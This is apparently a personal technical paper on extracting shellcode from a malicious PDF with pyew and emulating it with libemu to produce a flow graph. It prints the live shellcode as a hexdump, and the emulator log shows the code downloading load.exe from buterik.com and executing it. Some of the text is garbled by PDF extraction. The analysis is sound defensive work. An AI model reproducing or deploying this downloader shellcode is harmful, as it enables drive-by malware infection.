Libemu and extracting shellcodes from PDF malware

Using libemu to create malware flow graph

Muhammad Najmi Ahmad [email protected]∗

Abstract

In this paper basically I just document my personal experience, thatis the process of extracting shellcodes from PDF malware and later put itinto Graphviz’s picture. I adapt most the examples are from the tutorialgiven by [Jeremy, 2008].

1 Introduction

In this write up I will show to you on how to extract shellcodes from PDF files.

2 PDF malware

Malicious PDF contains embedded Javascript (*.js). This Javascript may doesharmful activity without the user’s consent.

3 Steps to extract shellcodes

3.1 Tools of trade

What we need to do basically use the existing tool. As of now I suggest you todownload the following tools:

• http://code.google.com/p/pyew/

• http://libemu.carnivore.it/

• http://www.graphviz.org/

3.2 Extracting the shellcode

I used pdf example.py from the pyew package.� �$ ls pdf_example.py -l

-rwxr -xr-x 1 najmi najmi 1497 2010 -03 -30 20:03 pdf_example.py� �Given that I have a PDF malware fetched from the wild:

∗Thanks to my wife, for providing hot coffee!

1

� �$ avgscan bc66fd9e0c2f7a79167dab16531c28f2

AVG command line Anti -Virus scanner

Copyright (c) 2009 AVG Technologies CZ

Virus database version: 271.1.1/2834

Virus database release date: Sun , 25 Apr 2010 14:31:00 +08:00

bc66fd9e0c2f7a79167dab16531c28f2 Virus found Script/Exploit

Files scanned : 1(1)

Infections found : 1(1)

PUPs found : 0

Files healed : 0

Warnings reported : 0

Errors reported : 0� �By using the said tool in Section 3.1 above, I manually took the intended

garbled shellcodes, which contains the following shellcodes:

Figure 1: PDF shellcodes in Pyew tool

Now let us see the strings. Take out the following strings in between theunescape() brakets, and save it somewhere in a texeditor.

2

Figure 2: PDF shellcodes (Zoom mode)

Now, we need to filter out the unintended strings, simply cut out using thefollowing perl script:

cat shell.txt | perl -pe ’s/\%u(..)(..)/ chr(hex($2)).chr(hex($1))/ge ’ > filtered -shell.txt

Now, you should get the intended shellcodes. You actually can see a plainURL within that PDF shellcodes. Say, by using hexdump tool:

$hexdump -C filtered -shell.txt

00000000 90 90 90 90 90 90 eb 0f 5b 33 c9 66 b9 80 01 80 |........[3.f....|

00000010 33 11 43 e2 fa eb 05 e8 ec ff ff ff 81 75 b0 21 |3.C..........u.!|

00000020 11 11 11 9a 51 1d 9a 61 0d bc 9a 61 19 90 fd 11 |....Q..a...a....|

00000030 15 11 11 9a fd 47 79 9f 5f 1f fd f9 ef 11 11 11 |..... Gy._.......|

00000040 98 54 15 47 79 89 ef 9b 1f f9 e1 11 11 11 98 54 |.T.Gy ..........T|

00000050 19 47 79 34 a1 ee d3 f9 f3 11 11 11 98 54 1d 47 |.Gy4 .........T.G|

00000060 79 fe df f1 71 f9 c5 11 11 11 98 54 01 47 79 d0 |y...q......T.Gy.|

00000070 68 f4 a9 f9 d7 11 11 11 98 54 05 51 91 29 d2 64 |h........T.Q.).d|

00000080 eb 98 54 09 f8 16 10 11 11 4f 98 64 35 9a 54 15 |..T......O.d5.T.|

00000090 7b 10 48 9a 44 09 47 f9 9a 11 11 11 41 79 27 0b |{.H.D.G.....Ay ’.|

000000 a0 3e 61 f9 86 11 11 11 98 54 0d 9a d4 92 d1 41 98 |>a......T.....A.|

000000 b0 54 31 79 ee 11 11 11 41 9a 54 05 7b 13 48 9a 44 |T1y ....A.T.{.H.D|

000000 c0 09 f9 70 11 11 11 12 54 31 d6 11 4d 6f 3f 74 d6 |..p....T1..Mo?t.|

000000 d0 51 15 69 74 11 11 ee 64 31 9a 54 1d 7b 10 48 9a |Q.it...d1.T.{.H.|

000000 e0 44 09 f9 51 11 11 11 7b 16 49 12 54 35 22 ca 42 |D..Q...{.I.T5".B|

000000 f0 42 ee 64 31 41 42 9a 54 0d 7b 14 48 9a 44 09 f9 |B.d1AB.T.{.H.D..|

00000100 32 11 11 11 7b 11 ee 64 31 9a 54 19 7b 13 48 9a |2...{.. d1.T.{.H.|

00000110 44 09 f9 01 11 11 11 7b ee 9a 54 01 7b 10 48 9a |D......{..T.{.H.|

00000120 44 09 f9 11 11 11 11 50 4a 43 12 f0 12 f0 12 f0 |D...... PJC ......|

00000130 12 f0 92 fd 15 4b 42 9a cb f3 e6 43 ee f1 44 9a |..... KB....C..D.|

00000140 fd 9a 6c 19 9a 4c 1d 47 9a 62 2d 9a 65 0f 69 12 |..l..L.G.b-.e.i.|

00000150 e2 47 9a 67 31 12 e2 22 d8 58 50 bc 12 d2 47 22 |.G.g1..".XP...G"|

00000160 e7 1e af 01 2b e3 65 19 d0 df 1c 12 e3 51 fa e0 |....+.e......Q..|

00000170 2a ef 4f 64 f4 4b 9a fa 9a 4b 35 12 cc 77 9a 1d |*.Od.K...K5..w..|

00000180 5a 9a 4b 0d 12 cc 9a 15 9a 12 d4 4f 4c d3 19 11 |Z.K........ OL...|

00000190 f9 e5 ef ee ee 44 43 5d 5c 5e 5f 11 68 74 74 70 |..... DC]\^_.http|

000001 a0 3a 2f 2f 62 75 74 65 72 69 6b 2e 63 6f 6d 2f 31 |:// buterik.com /1|

000001 b0 32 33 2f 6c 6f 61 64 2e 65 78 65 00 0a |23/ load.exe ..|

3

Now, we need to call the libemu’s tool called sctest. By using the followingcommand:� �sctest -Sgs 1000000 -v < filtered -shell -.txt� �

It will creates the following output:� �verbose = 1

success offset = 0x00000017

Hook me Captain Cook!

userhooks.c:132 user_hook_ExitThread

ExitThread (-1)

stepcount 314316

HMODULE LoadLibraryA (

LPCTSTR lpFileName = 0x00417195 =>

= "URLMON ";

) = 0x7df20000;

UINT GetSystemDirectory (

LPTSTR lpBuffer = 0x0012fae8 =>

= "c:\ WINDOWS\system32 ";

UINT uSize = 255;

) = 19;

ERROR DeleteFile (

LPCTSTR lpFileName = 0x0012fae8 =>

none;

) = -1;

HRESULT URLDownloadToFile (

LPUNKNOWN pCaller = 0x00000000 =>

none;

LPCTSTR szURL = 0x0041719c =>

= "http :// buterik.com /123/ load.exe";

LPCTSTR szFileName = 0x0012fae8 =>

= "c:\ WINDOWS\system32 \~.exe";

DWORD dwReserved = 0;

LPBINDSTATUSCALLBACK lpfnCB = 0;

) = 0;

UINT WINAPI WinExec (

LPCSTR lpCmdLine = 0x0012fae8 =>

= "c:\ WINDOWS\system32 \~.exe";

UINT uCmdShow = 0;

) = 32;

void ExitThread (

DWORD dwExitCode = -1;

) = 0;� �Now, if you want to create a flow graph, we need to add an extra flag, -G

flag to the tool’s execution.

sctest -Sgs 1000000 -v -G shell.dot < filtered -shell -bc66fd9e0c2f7a79167dab16531c28f2.txt

Next, execute the dot command (from Graphviz package):� �dot shell.dot -Tpng -o shell.png� �

This will create a PNG file which contains the following graph:

4

5

6

References

[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.

7